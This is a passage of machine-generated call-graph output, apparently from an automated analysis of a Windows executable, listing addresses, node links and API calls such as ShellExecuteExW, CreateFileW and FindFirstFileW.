26999->27000 27001 7ff7545520ea 26999->27001 27002 7ff754552126 27000->27002 27005 7ff75454b544 99 API calls 27000->27005 27001->27000 27003 7ff7545520f6 FindCloseChangeNotification 27001->27003 27002->26395 27003->27000 27005->27002 27007 7ff75456aa2f 27006->27007 27008 7ff75456aa36 27006->27008 27007->26546 27008->27007 27146 7ff754541744 33 API calls 4 library calls 27008->27146 27010->26546 27012 7ff75456a47f 27011->27012 27033 7ff75456a706 27011->27033 27147 7ff75456cdf8 33 API calls 27012->27147 27014 7ff754572320 _handle_error 8 API calls 27016 7ff75456a717 27014->27016 27015 7ff75456a49e 27017 7ff75454129c 33 API calls 27015->27017 27016->26479 27018 7ff75456a4de 27017->27018 27019 7ff75454129c 33 API calls 27018->27019 27020 7ff75456a517 27019->27020 27021 7ff75454129c 33 API calls 27020->27021 27022 7ff75456a54a 27021->27022 27148 7ff75456a834 33 API calls _invalid_parameter_noinfo_noreturn 27022->27148 27024 7ff75456a734 27025 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27024->27025 27026 7ff75456a73a 27025->27026 27027 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27026->27027 27028 7ff75456a740 27027->27028 27030 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27028->27030 27029 7ff75456a573 27029->27024 27029->27026 27029->27028 27031 7ff7545420b0 33 API calls 27029->27031 27034 7ff75456a685 27029->27034 27032 7ff75456a746 27030->27032 27031->27034 27036 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27032->27036 27033->27014 27034->27032 27034->27033 27035 7ff75456a72f 27034->27035 27038 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27035->27038 27037 7ff75456a74c 27036->27037 27039 7ff75454255c 61 API calls 27037->27039 27038->27024 27040 7ff75456a795 27039->27040 27041 7ff75456a7b1 27040->27041 27042 7ff75456a801 SetDlgItemTextW 27040->27042 27046 7ff75456a7a1 27040->27046 27043 7ff754572320 _handle_error 8 API calls 27041->27043 27042->27041 27044 7ff75456a827 27043->27044 27044->26479 27045 7ff75456a7ad 27045->27041 27047 7ff75456a7b7 EndDialog 27045->27047 27046->27041 27046->27045 27149 7ff75455bb00 102 API calls 27046->27149 27047->27041 27055 7ff75456f529 __scrt_get_show_window_mode 27049->27055 27070 7ff75456f87d 27049->27070 27050 7ff754541fa0 31 API calls 27051 7ff75456f89c 27050->27051 27052 7ff754572320 _handle_error 8 API calls 27051->27052 27053 7ff75456f8a8 27052->27053 27053->26482 27054 7ff75456f684 27057 7ff75454129c 33 API calls 27054->27057 27055->27054 27150 7ff7545613c4 CompareStringW 27055->27150 27058 7ff75456f6c0 27057->27058 27059 7ff7545532a8 51 API calls 27058->27059 27060 7ff75456f6ca 27059->27060 27061 7ff754541fa0 31 API calls 27060->27061 27065 7ff75456f6d5 27061->27065 27062 7ff75456f742 ShellExecuteExW 27063 7ff75456f755 27062->27063 27064 7ff75456f846 27062->27064 27067 7ff75456f7e3 CloseHandle 27063->27067 27071 7ff75456f78e 27063->27071 27076 7ff75456f781 ShowWindow 27063->27076 27069 7ff75456f8fb 27064->27069 27064->27070 27065->27062 27066 7ff75454129c 33 API calls 27065->27066 27068 7ff75456f717 27066->27068 27074 7ff75456f801 27067->27074 27075 7ff75456f7f2 27067->27075 27151 7ff754555b60 53 API calls 2 library calls 27068->27151 27073 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27069->27073 27070->27050 27152 7ff75456fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27071->27152 27079 7ff75456f900 27073->27079 27074->27064 27083 7ff75456f837 ShowWindow 27074->27083 27153 7ff7545613c4 CompareStringW 27075->27153 27076->27071 27078 7ff75456f725 27082 7ff754541fa0 31 API calls 27078->27082 27081 7ff75456f7a6 27081->27067 27085 7ff75456f7b4 GetExitCodeProcess 27081->27085 27084 7ff75456f72f 27082->27084 27083->27064 27084->27062 27085->27067 27086 7ff75456f7c7 27085->27086 27086->27067 27087->26546 27088->26546 27089->26546 27090->26546 27091->26546 27092->26546 27093->26546 27094->26546 27095->26546 27096->26546 27098 7ff7545572ea 27097->27098 27154 7ff75454b3a8 27098->27154 27101->26546 27103 7ff7545531e7 DeleteFileW 27102->27103 27104 7ff7545531e4 27102->27104 27105 7ff7545531fd 27103->27105 27106 7ff75455327c 27103->27106 27104->27103 27108 7ff754556a0c 49 API calls 27105->27108 27107 7ff754572320 _handle_error 8 API calls 27106->27107 27109 7ff754553291 27107->27109 27110 7ff754553222 27108->27110 27109->26546 27111 7ff754553243 27110->27111 27112 7ff754553226 DeleteFileW 27110->27112 27111->27106 27113 7ff7545532a1 27111->27113 27112->27111 27114 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27113->27114 27115 7ff7545532a6 27114->27115 27117->26546 27118->26546 27119->26546 27120->26546 27122 7ff754557e0c 27121->27122 27123 7ff754557e23 27122->27123 27124 7ff754557e55 27122->27124 27126 7ff75454129c 33 API calls 27123->27126 27158 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 27124->27158 27128 7ff754557e47 27126->27128 27127 7ff754557e5a 27128->26546 27129->26546 27130->26546 27134 7ff75455d25e 27131->27134 27132 7ff75455d292 27132->26537 27133 7ff754541744 33 API calls 27133->27134 27134->27132 27134->27133 27135->26439 27136->26426 27138->26405 27139->26409 27140->26411 27141->26462 27142->26452 27144->26458 27146->27008 27147->27015 27148->27029 27149->27045 27150->27054 27151->27078 27152->27081 27153->27074 27157 7ff75454b3f2 __scrt_get_show_window_mode 27154->27157 27155 7ff754572320 _handle_error 8 API calls 27156 7ff75454b4b6 27155->27156 27156->26546 27157->27155 27158->27127 27215 7ff7545586ec 27159->27215 27161 7ff75454e3c4 27221 7ff75454e600 27161->27221 27163 7ff75454e4d4 27166 7ff7545721d0 33 API calls 27163->27166 27164 7ff75454e549 27167 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27164->27167 27165 7ff75454e454 27165->27163 27165->27164 27169 7ff75454e4f0 27166->27169 27175 7ff75454e54e 27167->27175 27227 7ff754563148 102 API calls 27169->27227 27170 7ff75454e51d 27171 7ff754572320 _handle_error 8 API calls 27170->27171 27173 7ff75454e52d 27171->27173 27172 7ff7545518c2 27174 7ff75455190d 27172->27174 27176 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27172->27176 27173->26554 27174->26554 27175->27172 27175->27174 27177 7ff754541fa0 31 API calls 27175->27177 27178 7ff75455193b 27176->27178 27177->27175 27183 7ff75454e7ea 27179->27183 27180 7ff75454e864 27182 7ff75454e8a1 27180->27182 27184 7ff75454e993 27180->27184 27190 7ff75454e900 27182->27190 27235 7ff75454f578 27182->27235 27183->27180 27183->27182 27228 7ff754553ec8 27183->27228 27185 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27184->27185 27187 7ff75454e998 27185->27187 27186 7ff754572320 _handle_error 8 API calls 27189 7ff75454e97e 27186->27189 27193 7ff75454e578 27189->27193 27192 7ff75454e955 27190->27192 27271 7ff7545428a4 82 API calls 2 library calls 27190->27271 27192->27186 28275 7ff7545515d8 27193->28275 27196 7ff75454e59e 27198 7ff754541fa0 31 API calls 27196->27198 27197 7ff754561870 108 API calls 27197->27196 27199 7ff75454e5b7 27198->27199 27200 7ff754541fa0 31 API calls 27199->27200 27201 7ff75454e5c3 27200->27201 27202 7ff754541fa0 31 API calls 27201->27202 27203 7ff75454e5cf 27202->27203 27204 7ff75455878c 108 API calls 27203->27204 27205 7ff75454e5db 27204->27205 27206 7ff754541fa0 31 API calls 27205->27206 27207 7ff75454e5e4 27206->27207 27208 7ff754541fa0 31 API calls 27207->27208 27212 7ff75454e5ed 27208->27212 27209 7ff7545518c2 27210 7ff75455190d 27209->27210 27213 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27209->27213 27210->26558 27211 7ff754541fa0 31 API calls 27211->27212 27212->27209 27212->27210 27212->27211 27214 7ff75455193b 27213->27214 27216 7ff75455870a 27215->27216 27217 7ff7545721d0 33 API calls 27216->27217 27218 7ff75455872f 27217->27218 27219 7ff7545721d0 33 API calls 27218->27219 27220 7ff754558759 27219->27220 27220->27161 27222 7ff75454e627 27221->27222 27226 7ff75454e62c BuildCatchObjectHelperInternal 27221->27226 27223 7ff754541fa0 31 API calls 27222->27223 27223->27226 27224 7ff75454e668 BuildCatchObjectHelperInternal 27224->27165 27225 7ff754541fa0 31 API calls 27225->27224 27226->27224 27226->27225 27227->27170 27229 7ff7545572cc 8 API calls 27228->27229 27230 7ff754553ee1 27229->27230 27234 7ff754553f0f 27230->27234 27272 7ff7545540bc 27230->27272 27233 7ff754553efa FindClose 27233->27234 27234->27183 27236 7ff75454f598 _snwprintf 27235->27236 27311 7ff754542950 27236->27311 27239 7ff75454f5cc 27243 7ff75454f5fc 27239->27243 27326 7ff7545433e4 27239->27326 27242 7ff75454f5f8 27242->27243 27358 7ff754543ad8 27242->27358 27577 7ff754542c54 27243->27577 27250 7ff75454f7cb 27368 7ff75454f8a4 27250->27368 27252 7ff754548d04 33 API calls 27253 7ff75454f662 27252->27253 27597 7ff754557918 48 API calls 2 library calls 27253->27597 27255 7ff75454f677 27257 7ff754553ec8 55 API calls 27255->27257 27261 7ff75454f6ad 27257->27261 27258 7ff75454f842 27258->27243 27389 7ff7545469f8 27258->27389 27400 7ff75454f930 27258->27400 27264 7ff75454f89a 27261->27264 27265 7ff75454f74d 27261->27265 27268 7ff754553ec8 55 API calls 27261->27268 27598 7ff754557918 48 API calls 2 library calls 27261->27598 27266 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27264->27266 27265->27250 27265->27264 27267 7ff75454f895 27265->27267 27270 7ff75454f8a0 27266->27270 27269 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27267->27269 27268->27261 27269->27264 27271->27192 27273 7ff7545540f9 FindFirstFileW 27272->27273 27274 7ff7545541d2 FindNextFileW 27272->27274 27276 7ff7545541f3 27273->27276 27279 7ff75455411e 27273->27279 27274->27276 27277 7ff7545541e1 GetLastError 27274->27277 27278 7ff754554211 27276->27278 27282 7ff7545420b0 33 API calls 27276->27282 27296 7ff7545541c0 27277->27296 27286 7ff75454129c 33 API calls 27278->27286 27280 7ff754556a0c 49 API calls 27279->27280 27281 7ff754554144 27280->27281 27284 7ff754554167 27281->27284 27285 7ff754554148 FindFirstFileW 27281->27285 27282->27278 27283 7ff754572320 _handle_error 8 API calls 27287 7ff754553ef4 27283->27287 27284->27276 27289 7ff7545541af GetLastError 27284->27289 27291 7ff754554314 27284->27291 27285->27284 27288 7ff75455423b 27286->27288 27287->27233 27287->27234 27298 7ff754558090 27288->27298 27289->27296 27293 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27291->27293 27294 7ff75455431a 27293->27294 27295 7ff75455430f 27297 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27295->27297 27296->27283 27297->27291 27299 7ff7545580a5 27298->27299 27302 7ff754558188 27299->27302 27301 7ff754554249 27301->27295 27301->27296 27303 7ff754558326 27302->27303 27306 7ff7545581ba 27302->27306 27310 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 27303->27310 27305 7ff75455832b 27308 7ff7545581d4 BuildCatchObjectHelperInternal 27306->27308 27309 7ff7545558a4 33 API calls 2 library calls 27306->27309 27308->27301 27309->27308 27310->27305 27312 7ff75454296c 27311->27312 27313 7ff7545586ec 33 API calls 27312->27313 27314 7ff75454298d 27313->27314 27315 7ff7545721d0 33 API calls 27314->27315 27319 7ff754542ac2 27314->27319 27317 7ff754542ab0 27315->27317 27317->27319 27599 7ff7545491c8 27317->27599 27606 7ff754554d04 27319->27606 27321 7ff754552ca8 27638 7ff7545524c0 27321->27638 27323 7ff754552cc5 27323->27239 27657 7ff7545528d0 27326->27657 27327 7ff754543674 27676 7ff7545428a4 82 API calls 2 library calls 27327->27676 27329 7ff754543431 __scrt_get_show_window_mode 27335 7ff754543601 27329->27335 27337 7ff75454344e 27329->27337 27662 7ff754552bb0 27329->27662 27330 7ff7545469f8 132 API calls 27332 7ff754543682 27330->27332 27332->27330 27333 7ff75454370c 27332->27333 27332->27335 27357 7ff754552aa0 101 API calls 27332->27357 27333->27335 27338 7ff754543740 27333->27338 27677 7ff7545428a4 82 API calls 2 library calls 27333->27677 27335->27242 27336 7ff7545435cb 27336->27337 27339 7ff7545435d7 27336->27339 27337->27327 27337->27332 27338->27335 27341 7ff75454384d 27338->27341 27356 7ff754552bb0 101 API calls 27338->27356 27339->27335 27342 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27339->27342 27340 7ff7545434eb 27340->27336 27671 7ff754552aa0 27340->27671 27341->27335 27344 7ff7545420b0 33 API calls 27341->27344 27343 7ff754543891 27342->27343 27343->27242 27344->27335 27345 7ff7545469f8 132 API calls 27347 7ff75454378e 27345->27347 27347->27345 27348 7ff754543803 27347->27348 27350 7ff754552aa0 101 API calls 27347->27350 27352 7ff754552aa0 101 API calls 27348->27352 27349 7ff7545528d0 104 API calls 27349->27336 27350->27347 27352->27341 27355 7ff7545528d0 104 API calls 27355->27340 27356->27347 27357->27332 27359 7ff754543b55 27358->27359 27360 7ff754543af9 27358->27360 27362 7ff754572320 _handle_error 8 API calls 27359->27362 27689 7ff754543378 27360->27689 27364 7ff754543b67 27362->27364 27364->27250 27364->27252 27365 7ff754543b6c 27366 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27365->27366 27367 7ff754543b71 27366->27367 27917 7ff75455886c 27368->27917 27370 7ff75454f8ba 27921 7ff75455ef60 GetSystemTime SystemTimeToFileTime 27370->27921 27373 7ff754560994 27374 7ff754570340 27373->27374 27375 7ff754557df4 47 API calls 27374->27375 27376 7ff754570373 27375->27376 27377 7ff75455aae0 48 API calls 27376->27377 27378 7ff754570387 27377->27378 27379 7ff75455da98 48 API calls 27378->27379 27380 7ff754570397 27379->27380 27381 7ff754541fa0 31 API calls 27380->27381 27382 7ff7545703a2 27381->27382 27930 7ff75456fc68 49 API calls 2 library calls 27382->27930 27384 7ff7545703b8 27390 7ff754546a0e 27389->27390 27394 7ff754546a0a 27389->27394 27399 7ff754552bb0 101 API calls 27390->27399 27391 7ff754546a1b 27392 7ff754546a3e 27391->27392 27393 7ff754546a2f 27391->27393 27993 7ff754545130 130 API calls 2 library calls 27392->27993 27393->27394 27931 7ff754545e24 27393->27931 27394->27258 27397 7ff754546a3c 27397->27394 27994 7ff75454466c 82 API calls 27397->27994 27399->27391 27401 7ff75454f978 27400->27401 27405 7ff75454f9b0 27401->27405 27460 7ff75454fa34 27401->27460 28103 7ff75456612c 137 API calls 3 library calls 27401->28103 27403 7ff754551189 27406 7ff75455118e 27403->27406 27407 7ff7545511e1 27403->27407 27404 7ff754572320 _handle_error 8 API calls 27408 7ff7545511c4 27404->27408 27405->27403 27410 7ff75454f9d0 27405->27410 27405->27460 27406->27460 28152 7ff75454dd08 179 API calls 27406->28152 27407->27460 28153 7ff75456612c 137 API calls 3 library calls 27407->28153 27408->27258 27410->27460 28024 7ff754549bb0 27410->28024 27413 7ff75454fad6 28037 7ff754555ef8 27413->28037 27460->27404 27578 7ff754542c74 27577->27578 27582 7ff754542c88 27577->27582 27578->27582 28270 7ff754542d80 108 API calls _invalid_parameter_noinfo_noreturn 27578->28270 27579 7ff754541fa0 31 API calls 27581 7ff754542ca1 27579->27581 27584 7ff754542d64 27581->27584 28248 7ff754543090 27581->28248 27582->27579 27586 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27584->27586 27585 7ff754542d08 27587 7ff754543090 31 API calls 27585->27587 27588 7ff754542d7c 27586->27588 27589 7ff754542d14 27587->27589 27590 7ff754541fa0 31 API calls 27589->27590 27591 7ff754542d20 27590->27591 28256 7ff75455878c 27591->28256 27597->27255 27598->27261 27616 7ff7545556a4 27599->27616 27601 7ff7545491df 27619 7ff75455b788 27601->27619 27605 7ff754549383 27605->27319 27607 7ff754554d32 __scrt_get_show_window_mode 27606->27607 27634 7ff754554bac 27607->27634 27609 7ff754554d90 27611 7ff754572320 _handle_error 8 API calls 27609->27611 27610 7ff754554d54 27610->27609 27612 7ff754554dae 27610->27612 27613 7ff754542b32 27611->27613 27614 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27612->27614 27613->27239 27613->27321 27615 7ff754554db3 27614->27615 27625 7ff7545556e8 27616->27625 27620 7ff7545413a4 33 API calls 27619->27620 27621 7ff754549365 27620->27621 27622 7ff754549a28 27621->27622 27623 7ff7545556e8 2 API calls 27622->27623 27624 7ff754549a36 27623->27624 27624->27605 27626 7ff7545556fe __scrt_get_show_window_mode 27625->27626 27629 7ff75455eba4 27626->27629 27632 7ff75455eb58 GetCurrentProcess GetProcessAffinityMask 27629->27632 27633 7ff7545556de 27632->27633 27633->27601 27635 7ff754554c27 27634->27635 27637 7ff754554c2f BuildCatchObjectHelperInternal 27634->27637 27636 7ff754541fa0 31 API calls 27635->27636 27636->27637 27637->27610 27640 7ff7545524fd CreateFileW 27638->27640 27641 7ff7545525ae GetLastError 27640->27641 27650 7ff75455266e 27640->27650 27642 7ff754556a0c 49 API calls 27641->27642 27643 7ff7545525dc 27642->27643 27644 7ff7545525e0 CreateFileW GetLastError 27643->27644 27651 7ff75455262c 27643->27651 27644->27651 27645 7ff7545526b1 SetFileTime 27649 7ff7545526cf 27645->27649 27646 7ff754552708 27647 7ff754572320 _handle_error 8 API calls 27646->27647 27648 7ff75455271b 27647->27648 27648->27323 27656 7ff75454b7e8 99 API calls 2 library calls 27648->27656 27649->27646 27653 7ff7545420b0 33 API calls 27649->27653 27650->27645 27650->27649 27651->27650 27652 7ff754552736 27651->27652 27654 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27652->27654 27653->27646 27655 7ff75455273b 27654->27655 27656->27323 27659 7ff7545528f6 27657->27659 27661 7ff7545528fd 27657->27661 27658 7ff754552320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27658->27661 27659->27329 27661->27658 27661->27659 27678 7ff75454b8a4 99 API calls Concurrency::cancel_current_task 27661->27678 27663 7ff754552be9 27662->27663 27664 7ff754552bcd 27662->27664 27665 7ff7545434cc 27663->27665 27667 7ff754552c01 SetFilePointer 27663->27667 27664->27665 27679 7ff75454b9c4 99 API calls Concurrency::cancel_current_task 27664->27679 27665->27355 27667->27665 27668 7ff754552c1e GetLastError 27667->27668 27668->27665 27669 7ff754552c28 27668->27669 27669->27665 27680 7ff75454b9c4 99 API calls Concurrency::cancel_current_task 27669->27680 27681 7ff754552778 27671->27681 27674 7ff7545435a7 27674->27336 27674->27349 27676->27335 27677->27338 27682 7ff754552789 _snwprintf 27681->27682 27683 7ff754552890 SetFilePointer 27682->27683 27687 7ff7545527b5 27682->27687 27686 7ff7545528b8 GetLastError 27683->27686 27683->27687 27684 7ff754572320 _handle_error 8 API calls 27685 7ff75455281d 27684->27685 27685->27674 27688 7ff75454b9c4 99 API calls Concurrency::cancel_current_task 27685->27688 27686->27687 27687->27684 27690 7ff754543396 27689->27690 27691 7ff75454339a 27689->27691 27690->27359 27690->27365 27695 7ff754543294 27691->27695 27694 7ff754552aa0 101 API calls 27694->27690 27696 7ff7545432bb 27695->27696 27698 7ff7545432f6 27695->27698 27697 7ff7545469f8 132 API calls 27696->27697 27700 7ff7545432db 27697->27700 27703 7ff754546e74 27698->27703 27700->27694 27707 7ff754546e95 27703->27707 27704 7ff7545469f8 132 API calls 27704->27707 27705 7ff75454331d 27705->27700 27708 7ff754543904 27705->27708 27707->27704 27707->27705 27735 7ff75455e808 27707->27735 27743 7ff754546a7c 27708->27743 27711 7ff75454396a 27714 7ff75454399a 27711->27714 27715 7ff754543989 27711->27715 27712 7ff754543a8a 27716 7ff754572320 _handle_error 8 API calls 27712->27716 27720 7ff7545439ec 27714->27720 27721 7ff7545439a3 27714->27721 27776 7ff754560d54 33 API calls 27715->27776 27719 7ff754543a9e 27716->27719 27717 7ff754543ab3 27723 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27717->27723 27719->27700 27778 7ff7545426b4 33 API calls BuildCatchObjectHelperInternal 27720->27778 27777 7ff754560c80 33 API calls 27721->27777 27724 7ff754543ab8 27723->27724 27727 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27724->27727 27725 7ff7545439b0 27728 7ff754541fa0 31 API calls 27725->27728 27732 7ff7545439c0 BuildCatchObjectHelperInternal 27725->27732 27731 7ff754543abe 27727->27731 27728->27732 27729 7ff754541fa0 31 API calls 27734 7ff75454394f 27729->27734 27730 7ff754543a13 27779 7ff754560ae8 34 API calls _invalid_parameter_noinfo_noreturn 27730->27779 27732->27729 27734->27712 27734->27717 27734->27724 27736 7ff75455e811 27735->27736 27737 7ff75455e82b 27736->27737 27741 7ff75454b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27736->27741 27739 7ff75455e845 SetThreadExecutionState 27737->27739 27742 7ff75454b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27737->27742 27741->27737 27742->27739 27744 7ff754546a96 _snwprintf 27743->27744 27745 7ff754546ae4 27744->27745 27746 7ff754546ac4 27744->27746 27747 7ff754546d4d 27745->27747 27751 7ff754546b0f 27745->27751 27818 7ff7545428a4 82 API calls 2 library calls 27746->27818 27847 7ff7545428a4 82 API calls 2 library calls 27747->27847 27750 7ff754546ad0 27752 7ff754572320 _handle_error 8 API calls 27750->27752 27751->27750 27780 7ff754561f94 27751->27780 27753 7ff75454394b 27752->27753 27753->27711 27753->27734 27775 7ff754542794 33 API calls __std_swap_ranges_trivially_swappable 27753->27775 27756 7ff754546b85 27765 7ff754546c2a 27756->27765 27774 7ff754546b7b 27756->27774 27824 7ff754558968 109 API calls 27756->27824 27757 7ff754546b6e 27819 7ff7545428a4 82 API calls 2 library calls 27757->27819 27758 7ff754546b80 27758->27756 27820 7ff7545440b0 27758->27820 27764 7ff754546c52 27766 7ff754546cc7 27764->27766 27767 7ff754546cd1 27764->27767 27789 7ff754554760 27765->27789 27793 7ff754551794 27766->27793 27825 7ff754561f20 27767->27825 27808 7ff754561870 27774->27808 27775->27711 27776->27734 27777->27725 27778->27730 27779->27734 27781 7ff754562056 std::bad_alloc::bad_alloc 27780->27781 27784 7ff754561fc5 std::bad_alloc::bad_alloc 27780->27784 27848 7ff754574078 27781->27848 27782 7ff754546b59 27782->27756 27782->27757 27782->27758 27784->27782 27785 7ff754574078 Concurrency::cancel_current_task 2 API calls 27784->27785 27786 7ff75456200f std::bad_alloc::bad_alloc 27784->27786 27785->27786 27786->27782 27787 7ff754574078 Concurrency::cancel_current_task 2 API calls 27786->27787 27788 7ff7545620a9 27787->27788 27790 7ff754554780 27789->27790 27792 7ff75455478a 27789->27792 27791 7ff7545721d0 33 API calls 27790->27791 27791->27792 27792->27764 27809 7ff75456188e 27808->27809 27811 7ff7545618a1 27809->27811 27869 7ff75455e948 27809->27869 27815 7ff7545618d8 27811->27815 27876 7ff75457236c 27811->27876 27817 7ff754561a37 27815->27817 27880 7ff75455a984 31 API calls _invalid_parameter_noinfo_noreturn 27815->27880 27818->27750 27819->27774 27821 7ff7545440dd 27820->27821 27823 7ff7545440d7 __scrt_get_show_window_mode 27820->27823 27821->27823 27881 7ff754544120 27821->27881 27823->27756 27824->27765 27847->27750 27849 7ff754574097 27848->27849 27850 7ff7545740b4 RtlPcToFileHeader 27848->27850 27849->27850 27851 7ff7545740db RaiseException 27850->27851 27852 7ff7545740cc 27850->27852 27851->27784 27852->27851 27870 7ff75455ecd8 103 API calls 27869->27870 27871 7ff75455e95f ReleaseSemaphore 27870->27871 27877 7ff75457239f 27876->27877 27878 7ff7545723c8 27877->27878 27879 7ff754561870 108 API calls 27877->27879 27878->27815 27879->27877 27880->27817 27884 7ff754544149 27881->27884 27886 7ff754544168 __std_swap_ranges_trivially_swappable __scrt_get_show_window_mode 27881->27886 27882 7ff754542018 33 API calls 27883 7ff7545441eb 27882->27883 27885 7ff7545721d0 33 API calls 27884->27885 27884->27886 27885->27886 27886->27882 27918 7ff754558882 27917->27918 27919 7ff754558892 27917->27919 27924 7ff7545523f0 27918->27924 27919->27370 27922 7ff754572320 _handle_error 8 API calls 27921->27922 27923 7ff75454f7dc 27922->27923 27923->27258 27923->27373 27925 7ff75455240f 27924->27925 27928 7ff754552aa0 101 API calls 27925->27928 27926 7ff754552428 27929 7ff754552bb0 101 API calls 27926->27929 27927 7ff754552438 27927->27919 27928->27926 27929->27927 27930->27384 27932 7ff754545e67 27931->27932 27995 7ff7545585f0 27932->27995 27939 7ff754546973 27943 7ff75454612e 27943->27939 27945 7ff7545585f0 104 API calls 27943->27945 27993->27397 27996 7ff75455869a 27995->27996 27997 7ff754558614 27995->27997 27998 7ff75455867c 27996->27998 28000 7ff7545440b0 33 API calls 27996->28000 27997->27998 27999 7ff7545440b0 33 API calls 27997->27999 27998->27943 28001 7ff75455864d 27999->28001 28002 7ff7545586b3 28000->28002 28019 7ff75454a174 28001->28019 28004 7ff7545528d0 104 API calls 28002->28004 28004->27998 28029 7ff754549be7 28024->28029 28025 7ff754549c1b 28026 7ff754572320 _handle_error 8 API calls 28025->28026 28027 7ff754549c9d 28026->28027 28027->27413 28029->28025 28032 7ff754549cae 28029->28032 28036 7ff754549c83 28029->28036 28154 7ff754555294 28029->28154 28174 7ff75455db60 28029->28174 28030 7ff754541fa0 31 API calls 28030->28025 28033 7ff754549cbf 28032->28033 28178 7ff75455da48 CompareStringW 28032->28178 28035 7ff7545420b0 33 API calls 28033->28035 28033->28036 28035->28036 28036->28030 28050 7ff754555f3a 28037->28050 28103->27405 28152->27460 28153->27460 28155 7ff7545552d4 28154->28155 28160 7ff754555312 __vcrt_InitializeCriticalSectionEx 28155->28160 28170 7ff75455539e __vcrt_InitializeCriticalSectionEx 28155->28170 28185 7ff7545613f4 CompareStringW 28155->28185 28157 7ff754572320 _handle_error 8 API calls 28162 7ff754555339 28160->28162 28163 7ff754555382 __vcrt_InitializeCriticalSectionEx 28160->28163 28186 7ff7545613f4 CompareStringW 28160->28186 28162->28157 28163->28162 28164 7ff754555439 28163->28164 28165 7ff75454129c 33 API calls 28163->28165 28163->28170 28168 7ff75455551b 28164->28168 28169 7ff754555489 28164->28169 28166 7ff754555426 28165->28166 28169->28162 28169->28170 28170->28162 28179 7ff754555524 28170->28179 28176 7ff75455db73 28174->28176 28175 7ff75455db91 28175->28029 28176->28175 28177 7ff7545420b0 33 API calls 28176->28177 28177->28175 28178->28033 28182 7ff754555550 28179->28182 28185->28160 28186->28163 28249 7ff754541fa0 31 API calls 28248->28249 28250 7ff7545430a5 28249->28250 28251 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28250->28251 28252 7ff7545430fd 28251->28252 28253 7ff75455b825 28252->28253 28254 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28252->28254 28253->27585 28255 7ff75455b846 28254->28255 28257 7ff7545587af 28256->28257 28266 7ff7545587df 28256->28266 28258 7ff75457236c 108 API calls 28257->28258 28260 7ff7545587ca 28258->28260 28263 7ff75457236c 108 API calls 28260->28263 28261 7ff75457236c 108 API calls 28264 7ff754558814 28261->28264 28262 7ff754558845 28265 7ff75455461c 108 API calls 28262->28265 28263->28266 28267 7ff75457236c 108 API calls 28264->28267 28268 7ff754558851 28265->28268 28266->28261 28269 7ff75455882b 28266->28269 28267->28269 28271 7ff75455461c 28269->28271 28270->27582 28272 7ff754554632 28271->28272 28274 7ff75455463a 28271->28274 28273 7ff75455e948 108 API calls 28272->28273 28273->28274 28274->28262 28276 7ff754551681 28275->28276 28279 7ff75455163e 28275->28279 28277 7ff754541fa0 31 API calls 28276->28277 28284 7ff7545516a0 28276->28284 28277->28276 28278 7ff75454e600 31 API calls 28282 7ff7545516de 28278->28282 28279->28276 28280 7ff7545531bc 51 API calls 28279->28280 28280->28279 28281 7ff75455175b 28283 7ff754572320 _handle_error 8 API calls 28281->28283 28282->28281 28285 7ff75455178d 28282->28285 28286 7ff75454e58a 28283->28286 28284->28278 28287 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28285->28287 28286->27196 28286->27197 28288 7ff754551792 28287->28288 28290 7ff7545684cc 4 API calls 28289->28290 28291 7ff7545684aa 28290->28291 28293 7ff7545684b9 28291->28293 28301 7ff754568504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28291->28301 28293->26565 28293->26566 28294->26571 28295->26578 28297 7ff7545684de 28296->28297 28298 7ff7545684e3 28296->28298 28302 7ff754568590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28297->28302 28298->26578 28300->26580 28301->28293 28302->28298 28303->26600 28305->26630 28306->26646 28307->26653 28309->26658 28344 7ff754570df5 14 API calls _com_raise_error 28384 7ff754572d6c 28411 7ff7545727fc 28384->28411 28387 7ff754572eb8 28511 7ff754573170 7 API calls 2 library calls 28387->28511 28388 7ff754572d88 __scrt_acquire_startup_lock 28390 7ff754572ec2 28388->28390 28391 7ff754572da6 28388->28391 28512 7ff754573170 7 API calls 2 library calls 28390->28512 28400 7ff754572de8 __scrt_release_startup_lock 28391->28400 28417 7ff75457ce08 28391->28417 28395 7ff754572dcb 28396 7ff754572ecd abort 28398 7ff754572e51 28425 7ff7545732bc 28398->28425 28400->28398 28508 7ff75457c050 35 API calls __GSHandlerCheck_EH 28400->28508 28401 7ff754572e56 28428 7ff75457cd20 28401->28428 28513 7ff754572fb0 28411->28513 28414 7ff754572827 28414->28387 28414->28388 28415 7ff75457282b __scrt_initialize_crt 28415->28414 28515 7ff7545751a0 7 API calls 2 library calls 28415->28515 28419 7ff75457ce20 28417->28419 28418 7ff754572dc7 28418->28395 28421 7ff75457cd90 28418->28421 